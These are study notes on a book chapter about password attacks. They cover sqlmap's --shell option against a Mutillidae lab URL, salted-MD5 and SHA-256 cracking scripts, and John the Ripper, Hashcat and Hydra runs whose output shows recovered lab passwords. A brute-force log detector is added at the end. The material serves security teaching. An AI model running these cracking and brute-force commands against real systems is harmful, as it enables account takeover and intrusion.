Ethical.Hacking.2021.10:STEALING AND CRACKING PASSWORDS

Understanding HTTP Requests


Using SQLMap
This differs from the book: --sqlmap-shell is no longer used and has been replaced by --shell, as follows:

sudo sqlmap -u "http://192.168.1.102/mutillidae/index.php?page=user-info.php&username=&password=&" --shell

Note that the URL after -u must be wrapped in double quotes.

--banner: enumerate the DBMS type (retrieve its banner)


SecLists, an excellent collection of security lists, contains several password lists that you can use for your dictionary-based attacks.

You can clone the SecLists Git repository to your Kali Linux desktop by running the following command:

git clone https://github.com/danielmiessler/SecLists

The Anatomy of the MD5 Hash

The MD5 hash function operates on 512-bit blocks. The first 448 bits of this block contain the message that is being hashed, and the last 64 bits are the message's length.

Even after all this mixing, in 1993, Antoon Bosselaers and Bert den Boer discovered that MD5 doesn't meet the collision-resistance property of hashes, because it's possible to generate two messages with the same hash. Because of this, the MD5 algorithm is no longer secure and shouldn't be used when building cryptographic systems. Not to worry: other hash algorithms such as SHA-256, SHA-512, and SHA-3 are still considered secure.

Cracking Hashes

Write our own hash-cracking tool:

myHashCracker.py 

import hashlib

def crack_MD5_Hash(hash_to_crack, salt, dictionary_file):
    # Try every line of the wordlist as a candidate; the salt is prepended
    # before hashing, matching how the target hash was produced
    with open(dictionary_file, "r", encoding="utf-8", errors="ignore") as file:
        for password in file:
            password = password.rstrip("\r\n")   # also handles CRLF wordlists
            salted_password = (salt + password).encode("UTF-8")
            if hashlib.md5(salted_password).hexdigest() == hash_to_crack.lower():
                return password   # candidate without its trailing newline
    return None

hash_to_crack = 'c94201dbba5cb49dc3a6876a04f15f75'
salt = 'd6a6bc0db10694a2d90e3a69648f3a03'
dictionary = 'darkweb2017-top10000.txt'   # 'dict' would shadow the built-in type

password = crack_MD5_Hash(hash_to_crack, salt, dictionary)
print(password)

Popular Hash Cracking and Brute-Forcing Tools

John the Ripper

sudo john --format=raw-sha256 --wordlist=/home/kali/SecLists-master/Passwords/Leaked-Databases/000webhost.txt hashes.txt 
[sudo] kali 的密码:
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA256 [SHA256 256/256 AVX2 8x])
Warning: poor OpenMP scalability for this hash type, consider --fork=4
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
pleasetrustno1   (?)
1g 0:00:00:00 DONE (2021-12-20 21:54) 50.00g/s 6553Kp/s 6553Kc/s 6553KC/s z0m0rg..sekretariat147
Use the "--show --format=Raw-SHA256" options to display all of the cracked passwords reliably
Session completed
sudo john --format=raw-sha256 --show hashes.txt 
?:pleasetrustno1

1 password hash cracked, 0 left

Hashcat

Running Hashcat in a virtual machine may result in an illegal instruction error.

Use Hashcat to crack the hashes.txt file:

hashcat -a 0 -m 1400 hashes.txt ~/SecLists-master/Passwords/darkweb2017-top10000.txt

The -a flag represents the attack mode, or strategy, used to crack the hash. 

To reduce the number of combinations Hashcat must test, you can supply a mask. A mask is a pattern that defines the password's structure. For example, the pattern ?u?l?l?d?s specifies a five-character password. The ?u indicates that the password starts with an uppercase letter. This uppercase letter is followed by two lowercase letters (?l), and the pattern ends with a digit (?d) followed by a symbol (?s). As a result, this mask might test the password Bas5!.

The -m (or mode) option represents the algorithm used to create the hash. 
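To make the "reduce the number of combinations" point concrete, here is an added example (my own code, neither the book's nor Hashcat's) that expands a Hashcat-style mask, counts its keyspace, and runs the candidates against a SHA-256 digest (the algorithm behind -m 1400). It also accepts literal characters and ?? for a literal question mark, which Hashcat masks allow. The CHARSETS table, the function names, and the target digest (constructed here from the book's own sample password Bas5!) are all mine.

```python
# Added example (not from the book or Hashcat): mask keyspace and a mask attack
# against a SHA-256 digest (what hashcat -a 3 -m 1400 does natively, much faster).
import hashlib
import itertools
import string

# Hashcat's built-in charsets: ?s is a space plus the 32 ASCII punctuation marks
CHARSETS = {
    "l": string.ascii_lowercase,
    "u": string.ascii_uppercase,
    "d": string.digits,
    "s": " " + string.punctuation,
}
CHARSETS["a"] = CHARSETS["l"] + CHARSETS["u"] + CHARSETS["d"] + CHARSETS["s"]


def parse_mask(mask: str) -> list:
    """Turn '?u?l?l?d?s' into one charset per position; literals stand for themselves."""
    positions = []
    i = 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask):
            key = mask[i + 1]
            if key == "?":
                positions.append("?")          # '??' is a literal question mark
            elif key in CHARSETS:
                positions.append(CHARSETS[key])
            else:
                raise ValueError(f"unknown charset ?{key}")
            i += 2
        else:
            positions.append(mask[i])          # literal character
            i += 1
    return positions


def mask_keyspace(mask: str) -> int:
    """Number of candidates the mask generates (product of the charset sizes)."""
    total = 1
    for charset in parse_mask(mask):
        total *= len(charset)
    return total


def candidates(mask: str):
    for combo in itertools.product(*parse_mask(mask)):
        yield "".join(combo)


def crack_sha256_with_mask(target_hex: str, mask: str):
    """Return the first candidate whose SHA-256 matches target_hex, or None."""
    target = bytes.fromhex(target_hex)
    for cand in candidates(mask):
        if hashlib.sha256(cand.encode()).digest() == target:
            return cand
    return None


# Constructed target: SHA-256 of the book's sample password, so the script runs offline
TARGET_HASH = hashlib.sha256(b"Bas5!").hexdigest()

if __name__ == "__main__":
    print("?u?l?l?d?s keyspace:", mask_keyspace("?u?l?l?d?s"))   # 5,800,080
    print("?a?a?a?a?a keyspace:", mask_keyspace("?a?a?a?a?a"))   # 95**5
    print("recovered:", crack_sha256_with_mask(TARGET_HASH, "?u?l?l?d?s"))
```

The two keyspace numbers are the whole argument for masks: five positions of ?a (95 characters each) give 95^5 candidates, while ?u?l?l?d?s gives 26*26*26*10*33, more than a thousand times fewer. From the defensive side the same arithmetic shows why a policy that fixes where the capital, digit and symbol go shrinks the search space instead of enlarging it.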


Hydra

Use the default usernames and passwords in the ftp-betterdefaultpasslist.txt list, which is part of SecLists:

hydra -C ~/SecLists-master/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt 10.10.10.17 ftp
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-20 22:25:20
[DATA] max 16 tasks per 1 server, overall 16 tasks, 66 login tries, ~5 tries per task
[DATA] attacking ftp://10.10.10.17:21/
[21][ftp] host: 10.10.10.17   login: ftp   password: b1uRR3
[21][ftp] host: 10.10.10.17   login: anonymous   password: anonymous
[21][ftp] host: 10.10.10.17   login: ftp   password: ftp
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-12-20 22:25:34

hydra -L seclists/Usernames/top-usernames-shortlist.txt -P seclists/Passwords/darkweb2017-top10000.txt 10.10.10.17 http-get-form "/mutillidae/index.php?page=user-info.php&:username=^USER^&password=^PASS^&:Error:Bad usename or password"

In the http-get-form specification, Hydra uses colons to separate the fields: the page path, the query parameters, and the string that marks a failed login.

Use the ^USER^ and ^PASS^ placeholders to indicate where Hydra should insert the username and password in the URL.
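Seen from the web server, the http-get-form run above is a burst of requests to one login URL from one client, each carrying a different username/password pair and (on Mutillidae) each answered with HTTP 200 plus an error message in the body, so status codes alone do not reveal failures. The following is an added example (my own, not from the book or Hydra) of the detection side: it parses combined-format access log lines and flags any client that hits the login page more than a threshold number of times inside a sliding window. The log lines are constructed for this example, the endpoint path is taken from the book's command, and the threshold and window values are arbitrary choices.

```python
# Added example (not from the book or Hydra): flag login-form brute forcing in
# web access logs. Sample log lines are constructed; tune threshold/window locally.
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache/nginx "combined" log format: ip ident user [time] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
LOGIN_PATH = "/mutillidae/index.php"      # from the book's hydra command
LOGIN_PAGE = "page=user-info.php"


def parse_line(line: str):
    """Return (ip, timestamp, path, status) or None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("path"), int(m.group("status"))


def is_login_attempt(path: str) -> bool:
    """A request to the user-info page that carries a password parameter."""
    base, _, query = path.partition("?")
    return base == LOGIN_PATH and LOGIN_PAGE in query and "password=" in query


def find_bruteforce(lines, threshold=10, window_seconds=60):
    """Return {ip: max attempts seen inside one window} for clients at or above threshold."""
    recent = defaultdict(deque)   # per-client timestamps of login attempts
    flagged = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, path, _status = parsed    # status is ignored: the app answers 200 either way
        if not is_login_attempt(path):
            continue
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()               # slide the window forward
        if len(q) >= threshold:
            flagged[ip] = max(flagged.get(ip, 0), len(q))
    return flagged


# Constructed sample: 12 attempts in 12 seconds from one client, one ordinary page view from another
SAMPLE_LOG = [
    f'10.10.10.50 - - [20/Dec/2021:22:30:{sec:02d} +0000] '
    f'"GET {LOGIN_PATH}?{LOGIN_PAGE}&username=user{sec}&password=pass{sec}& HTTP/1.1" 200 5120'
    for sec in range(12)
] + [
    '10.10.10.60 - - [20/Dec/2021:22:30:05 +0000] "GET /mutillidae/index.php?page=home.php HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    print(find_bruteforce(SAMPLE_LOG))   # {'10.10.10.50': 12}
```

Because the form is submitted with GET, the credentials land in the access log in clear text, which is a second finding worth raising against any application that still does this: the log itself becomes a password store.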
